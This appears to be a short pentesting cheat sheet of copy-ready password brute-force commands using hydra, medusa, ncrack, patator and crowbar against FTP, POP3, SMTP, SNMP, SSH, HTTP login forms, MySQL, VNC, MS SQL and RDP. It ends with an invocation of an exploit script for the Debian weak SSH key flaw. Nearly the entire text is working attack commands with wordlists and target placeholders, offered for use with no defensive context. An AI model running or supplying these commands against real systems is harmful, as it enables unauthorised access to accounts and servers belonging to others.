🥷 Brute-force attacks Cheat Sheet (FTP, POP3, SNMP, SSH, VNC, …)
Improve your pentesting skills with the following techniques.
Tool: hydra
Attack FTP:
hydra -l $USERNAME -P /usr/share/wordlists/nmap.lst -f $IP ftp -V
Attack POP3:
hydra -l $USERNAME -P /usr/share/wordlists/nmap.lst -f $IP pop3 -V
Attack SMTP:
hydra -P /usr/share/wordlists/nmap.lst $IP smtp -V
Attack SNMP:
hydra -P /usr/share/wordlists/snmp.txt -v $IP snmp
Attack HTTP form:
hydra -l root@localhost -I -P cewl.txt $IP http-post-form "/$SCRIPT_PATH:Action=Login&User=^USER^&Password=^PASS^:Login failed" -V
Attack SSH (OpenSSH):
hydra -l root -P /usr/share/wordlists/rockyou.txt $IP ssh
hydra -t 4 -L users.txt -P pass.txt -M targets.txt ssh
Attack MySQL:
hydra -l root -P /usr/share/wordlists/rockyou.txt $IP mysql
Attack VNC:
hydra -P /usr/share/wordlists/rockyou.txt $IP -t 1 vnc
Check credentials for MS SQL:
hydra -l sa -p PASSWORD mssql://$IP
Check credentials for MS SQL on different port:
hydra -l sa -p password mssql://$IP:27900
Tool: Medusa
Attack HTTP Basic authentication against phpmyadmin directory:
medusa -h $IP -u admin -P /usr/share/wordlists/megacorp.txt -m DIR:/phpmyadmin/ -t 10 -M http
Attack FTP:
medusa -u kevin -P /usr/share/wordlists/megacorp-last.txt -h $IP -M ftp -t 10
List available modules:
ls /usr/lib/medusa/modules/
Others
ncrack -vv --user Administrator -P /usr/share/wordlists/megacorp.txt rdp://$IP
patator ftp_login host=$IP user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
./crowbar.py -b rdp -s $IP/24 -U /root/Desktop/userlist -C /root/Desktop/passlist -d
./crowbar.py -b sshkey -s $IP/24 -u root -k /root/.ssh/ -d
python CVE-2008-0166-Debian-ssh-PRNG.py TOOLS/rsa/2048 $IP root 22 6